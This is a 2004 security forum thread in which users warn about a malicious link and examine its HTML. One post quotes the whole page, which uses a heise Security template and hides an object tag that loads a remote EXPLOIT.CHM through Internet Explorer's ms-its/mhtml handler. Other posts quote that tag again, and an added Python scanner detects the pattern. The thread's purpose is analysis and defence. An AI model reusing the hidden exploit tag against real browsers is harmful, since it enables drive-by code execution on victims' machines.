AdmiralB
Apr 11 2004, 09:46 AM
VIRUS
CAREFUL
hXXp://people.freenet.de/gangstah/cs_lamer.txt/
nuorder
Apr 11 2004, 10:47 AM
Looks like it might be a CHM or Flash IE exploit, but it didn't work on my PC so I can't be sure.
Maybe you should examine this part:
<object
data="ms-its:mhtml:file://C:\foo.mhtml!http://people.freenet.de/gangstah//EXPLOIT.CHM::exploit.htm"
type="text/x-scriptlet"
style="visibility:hidden">
epi
Apr 11 2004, 10:51 AM
| QUOTE |
<html> <head>
<!-- Site Navigation Bar --> <link rel="contents" title="heise Security" href="/security/"> <link rel="chapter" title="News" href="/security/news/"> <link rel="section" title="News:7-Tage-Alerts" href="/security/news/alerts.shtml"> <link rel="section" title="News:7-Tage-News" href="/security/news/"> <link rel="section" title="News:Archiv" href="/security/news/archiv/2003/">
<link rel="chapter" title="Hintergrund" href="/security/artikel/"> <link rel="section" title="Hintergrund:BSI-Info" href="/security/artikel/bsi/">
<link rel="section" title="Hintergrund:Know-how" href="/security/artikel/knowhow/"> <link rel="section" title="Hintergrund:Kommentare" href="/security/artikel/kommentare/"> <link rel="section" title="Hintergrund:Praxis" href="/security/artikel/praxis/"> <link rel="section" title="Hintergrund:Produkte" href="/security/artikel/produkte/">
<link rel="chapter" title="Foren" href="/security/foren/go.shtml"> <link rel="section" title="Foren:Desktopsicherheit" href="/security/foren/go.shtml?list=1&forum_id=44157"> <link rel="section" title="Foren:Firewall, VPN & IDS" href="/security/foren/go.shtml?list=1&forum_id=44153"> <link rel="section" title="Foren:heise Security" href="/security/foren/go.shtml?list=1&forum_id=44159"> <link rel="section" title="Foren:Penetration Tests" href="/security/foren/go.shtml?list=1&forum_id=44154"> <link rel="section" title="Foren:Politik und Gesellschaft" href="/security/foren/go.shtml?list=1&forum_id=44158"> <link rel="section" title="Foren:Schwachstellen" href="/security/foren/go.shtml?list=1&forum_id=44155"> <link rel="section" title="Foren:Serversicherheit" href="/security/foren/go.shtml?list=1&forum_id=44156"> <link rel="section" title="Foren:Verschlüsselung" href="/security/foren/go.shtml?list=1&forum_id=44716"> <link rel="section" title="Foren:Viren & Würmer" href="/security/foren/go.shtml?list=1&forum_id=44152">
<link rel="chapter" title="Dienste" href="/security/dienste/">
<link rel="section" title="Dienste:Anti-Virus" href="/security/dienste/antivirus/"> <link rel="section" title="Dienste:Browsercheck" href="/security/dienste/browsercheck/"> <link rel="section" title="Dienste:IT's secure" href="/security/dienste/itssecure/"> <link rel="section" title="Dienste:Krypto-Kampagne" href="/security/dienste/pgp/"> <link rel="section" title="Dienste:Tools" href="/security/tools/">
<link rel="bookmark" type="text/html" title="heise online" href="http://www.heise.de"> <link rel="bookmark" type="text/html" title="c't" href="http://www.ctmagazin.de"> <link rel="bookmark" type="text/html" title="iX" href="http://www.ix.de"> <link rel="bookmark" type="text/html" title="Technology Review" href="http://www.technology-review.de"> <link rel="bookmark" type="text/html" title="Telepolis" href="http://www.telepolis.de"> <link rel="bookmark" type="text/html" title="heise mobil" href="http://www.heisemobil.de"> <link rel="bookmark" type="text/html" title="heise Security" href="http://www.heisec.de"> <link rel="bookmark" type="text/html" title="c'tTV" href="http://www.cttv.de"> <link rel="bookmark" type="text/html" title="heise jobs" href="http://www.heisejobs.de"> <link rel="bookmark" type="text/html" title="heise Kiosk" href="http://www.heise.de/kiosk/"> <link rel="bookmark" type="text/html" title="Heise Medien Gruppe" href="http://www.heise-medien.de">
<link rel="copyright" title="Heise Zeitschriften Verlag" href="/security/impressum/"> <link rel="start" title="Start" href="/security/"> <link rel="search" title="Suchen" href="/security/suche.shtml"> <link rel="help" title="Hilfe" href="/security/faq/"> <link rel="author" title="Kontakt" href="mailto:red%40heisec.de?subject=heise%20Security"> <link rel="home" title="home:heise online" href="/">
<link rel="alternate" type="application/rss+xml" title="RDF-Datei" href="http://www.heise.de/security/news/news.rdf">
<link rel="first" title="first:News" href="/security/news/"> <link rel="last" title="last:Dienste" href="/security/dienste/">
<!-- Allgemeines Standard-Stylesheet --> <link href="/stil/standard.css" rel="stylesheet" type="text/css" media="screen, projection">
<!-- heisec Standard-Stylesheet --> <link href="/stil/security/standard.css" rel="stylesheet" type="text/css" media="screen, projection">
<!-- Site Navigation Bar News-Meldungen-->
<!-- Site Navigation Bar und Stylesheets fuer Unterbereiche -->
<link rel="up" title="up:heise Security" href="/security/"> <link rel="prev" title="prev:Foren" href="/security/foren/go.shtml"> <link rel="next" title="next:News" href="/security/news/">
<link href="/stil/security/dienste.css" rel="stylesheet" type="text/css" media="screen, projection">
<!-- Allgemeines Druck-Stylesheet --> <link href="/stil/drucken.css" rel="stylesheet" type="text/css" media="print">
<!-- heisec Druck-Stylesheet --> <link href="/stil/security/drucken.css" rel="stylesheet" type="text/css" media="print">
<!-- Seitenname --> <title></title>
<!-- Keywords, Description -->
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <meta name="keywords" content="heise Security, heise online, c't, iX, Technology Review, Telepolis, heise mobil, Newsticker"> <meta name="description" content="heise Security">
<!-- Staendige Aktualisierung -->
<!-- Favicon--> <link href="/favicon.ico" rel="shortcut icon">
<!-- nicht in Frames--> <base target="_top"> </head>
<!-- Body --> <body bgcolor="#FFFFFF" text="#000000" link="#003399" vlink="#666666" alink="#3366cc" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<!-- allgemeine obere Navigation --> <p>
Please wait...<p align="center"> </p> <p align="center">
<object data="ms-its:mhtml:file://C:\foo.mhtml!http://people.freenet.de/gangstah//EXPLOIT.CHM::exploit.htm" type="text/x-scriptlet" style="visibility:hidden">
</HEISETEXT> </td> </tr> </table>
</td> <td class="druck"><img src="/icons/ho/1pix.gif" width="1" height="1" hspace="5" alt=""></td> <!-- Skyscraper --> <td valign="top" class="druck"><skyscraper><table border="0"> <tr align="center"> <td><script Language="Javascript"> var shockwaveFile="http://adserv.quality-channel.de/images/HE40X720XSKY1/kw13/sym_12_esm.swf"; var alternateGif="http://adserv.quality-channel.de/images/HE40X720XSKY1/kw13/sym_12_esm.gif"; function sym_12_esm(){window.open("http://www.heise.de/RealMedia/ads/click_lx.ads/www.heise.de/security/dienste/955925275/Left1/HE40X720XSKY1/HE40X720XSKY1_60.html/38322e38332e3230352e313536?_RM_REDIR_=adserv.quality-channel.de/RealMedia/ads/secure2.cgi?enterprisesecurity.symantec.de/products/products.cfm~~QM~~productid~~EQ~~111~~AMP~~EI")}; var ver = 0; var ShockMode = 0; var plug = 0; ver = parseInt(navigator.appVersion.substring(0,1)); function checkNetscape(){ if(navigator.appName == "Netscape" && (navigator.userAgent.indexOf("Win")>=0 || navigator.userAgent.indexOf("Macintosh")>=0) && navigator.userAgent.indexOf("Opera") == -1){ for(i=0;i<navigator.plugins.length;i++){ if((navigator.plugins[i].description.indexOf("Flash 5.0") >= 0) || (navigator.plugins[i].description.indexOf("Flash 6.0") >= 0)){ plug = 1; break; } } } else if (navigator.userAgent && navigator.userAgent.indexOf("MSIE")>=0 && navigator.userAgent.indexOf("Win")>=0 && navigator.userAgent.indexOf("Opera") == -1){ document.writeln('<script LANGUAGE=VBScript\> '); document.writeln('on error resume next '); document.writeln('ShockMode = (IsObject(CreateObject("ShockwaveFlash.ShockwaveFlash.5"))) '); document.write("</SCR" + "IPT>"); if(ShockMode) plug = 1; } } if(ver > 2) checkNetscape(); if(plug == 1){ document.write('<EMBED SRC="'+shockwaveFile+'" TYPE="application/x-shockwave-flash" WIDTH="137" HEIGHT="800" PLAY="true" LOOP="true" WMODE="opaque" QUALITY="autohigh" PLUGINSPACE="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=Shockwave"></EMBED>'); } else{ 
document.write('<a href="http://www.heise.de/RealMedia/ads/click_lx.ads/www.heise.de/security/dienste/955925275/Left1/HE40X720XSKY1/HE40X720XSKY1_60.html/38322e38332e3230352e313536?_RM_REDIR_=adserv.quality-channel.de/RealMedia/ads/secure2.cgi?enterprisesecurity.symantec.de/products/products.cfm~~QM~~productid~~EQ~~111~~AMP~~EI" target="_blank"><img src="'+alternateGif+'" WIDTH="137" HEIGHT="800" border="0" ALT="Hier klicken!"></a>'); } </SCRIPT><img SRC="http://www.heise.de/RealMedia/ads/adstream_lx.ads/www.heise.de/security/dienste/955925275/Left1/HE40X720XSKY1/HE40X720XSKY1_60.html/38322e38332e3230352e313536?_RM_EMPTY_" WIDTH="1" HEIGHT="1"></td> </tr> </table> </skyscraper></td>
</tr> </table> </td> </tr> </table>
<!-- IVW-Pixel -->
<img src="/ivw-bin/ivw/CP/security/dienste/browsercheck/demos/ie/mhtml/boom.shtml" width="1" height="1" alt=""> <img src="http://heise.ivwbox.de/cgi-bin/ivw/CP/security_dienste;/security/dienste/browsercheck/demos/ie/mhtml/boom.shtml?r=(none)" width="1" height="1" alt="">
<!-- SZMFRABO -->
<br> <table border="0" cellspacing="0" cellpadding="0" width="100%"> <tr> <td bgcolor="#999999"><img src="/icons/ho/1pix.gif" width="1" height="1" hspace="375" alt=""></td> </tr> <tr> <td bgcolor="#eeeeee"> <table cellpadding="2" cellspacing="2" border="0" width="100%">
<tr> <td><span class="navi_unten">Copyright © 2004 </span><a href="http://www.heise-medien.de/zeitschriften/" target="_blank" class="navi_unten">Heise Zeitschriften Verlag</a></td> <td align="right" nowrap> <div class="druck"> <a href="/privacy/" class="navi_unten">Datenschutzhinweis</a> <a href="/security/impressum/" class="navi_unten">Impressum</a>
<a href="/security/impressum/" class="navi_unten">Kontakt</a> <a href="/security/suche.shtml" class="navi_unten">Suche</a> <a href="/security/faq/" class="navi_unten">FAQ</a> </div> </td> </tr>
</table> </td> </tr> </table>
</body> </html>
</p> </p>
|
MsMittens
Apr 11 2004, 11:05 AM
There are a few interesting lines but I think these ones stand out:
| QUOTE |
<object data="ms-its:mhtml:file://C:\foo.mhtml!http://people.freenet.de/gangstah//EXPLOIT.CHM::exploit.htm" type="text/x-scriptlet" style="visibility:hidden"> |
This link should give you more info on the "exploit" (if you haven't heard of it before).
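An added defensive check, not code from this thread or from anyone posting in it: a small Python scanner that parses HTML and flags the pattern MsMittens singled out, an object (or embed/iframe) whose data/src URL starts with the ms-its: or mhtml: protocol handler, chains a local mhtml path to a remote resource with "!", or declares type="text/x-scriptlet". The sample page is constructed for the example and points at a placeholder host (example.invalid), not the URL from the thread.

```python
"""Flag HTML elements that load content through the ms-its:/mhtml:
protocol handlers, the indicator quoted earlier in this thread."""
from html.parser import HTMLParser

# Constructed sample page (not the file linked in the thread): one benign
# Flash object and one element shaped like the quoted tag, on a placeholder host.
SAMPLE_HTML = r"""<html><body>
<p>Please wait...</p>
<object data="movie.swf" type="application/x-shockwave-flash"></object>
<object data="ms-its:mhtml:file://C:\foo.mhtml!http://example.invalid/EXPLOIT.CHM::exploit.htm"
        type="text/x-scriptlet" style="visibility:hidden"></object>
</body></html>"""

# Schemes that appear in the quoted tag; both route through the CHM/MHTML handlers.
SUSPECT_SCHEMES = ("ms-its:", "mhtml:")


class ProtocolHandlerScanner(HTMLParser):
    """Collects findings for tags whose URL-bearing attribute looks suspicious."""

    # Tag -> attribute that carries the loaded URL.
    URL_ATTRS = {"object": "data", "embed": "src", "iframe": "src"}

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        attr_name = self.URL_ATTRS.get(tag)
        if attr_name is None:
            return
        attrs = dict(attrs)
        raw_url = attrs.get(attr_name) or ""
        url = raw_url.strip().lower()
        mime = (attrs.get("type") or "").strip().lower()

        reasons = []
        if url.startswith(SUSPECT_SCHEMES):
            reasons.append("protocol handler " + url.split(":", 1)[0])
        if "mhtml:file://" in url and "!" in url:
            reasons.append("local mhtml path chained to a remote resource with '!'")
        if mime == "text/x-scriptlet":
            reasons.append("type=text/x-scriptlet")

        if reasons:
            self.findings.append({
                "tag": tag,
                "url": raw_url,
                "line": self.getpos()[0],
                "reasons": reasons,
            })


def scan_html(html):
    """Return a list of findings (dicts) for the given HTML text."""
    scanner = ProtocolHandlerScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


if __name__ == "__main__":
    for hit in scan_html(SAMPLE_HTML):
        print(f"line {hit['line']}: <{hit['tag']}> {hit['url']}")
        for reason in hit["reasons"]:
            print("   -", reason)
```

The benign Flash object produces no finding; the second object is reported with all three reasons. Running this over saved copies of pages you are asked to look at is a quick triage step, since the scheme prefix and the scriptlet MIME type are visible in the static source and do not depend on executing anything.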
dr0zaxx
Apr 12 2004, 06:16 AM
Hi guys, I hope this information from me is very useful to all of you. Please take your time to read it.

No flaming please... thanks. Since I am still a trial member and I can't attach files, you can view the file from my website. Thanks.
URL is below:
WALKTHROUGH_OF_VIRUS.pdf
tstngry
Apr 12 2004, 07:15 AM
I found your information very interesting. I have read others of your .pdf information files and I liked them also. Keep up the good work. People really need this info whether they admit it or not.
dr0zaxx
Apr 12 2004, 07:51 AM
| QUOTE |
tstngry Posted on Apr 12 2004, 07:15 AM I found your information very interesting. I have read others of your .pdf information files and I liked them also. Keep up the good work. People really need this info whether they admit it or not. |
Heh..heh..heh.. no problem. Glad to be of any help... have to post something useful once in a while, else GSO might remove my account!!!
epi
Apr 13 2004, 06:52 AM
Nice PDF, dro.
An interesting rundown of what is happening... and all in easy PDF format.
Player_0
Apr 20 2004, 04:39 AM
The CHM sounds like an Internet Explorer exploit which I think was fixed in the recent Microsoft patches. The OBJ exploit might have been fixed too with some others. Don't use IE =P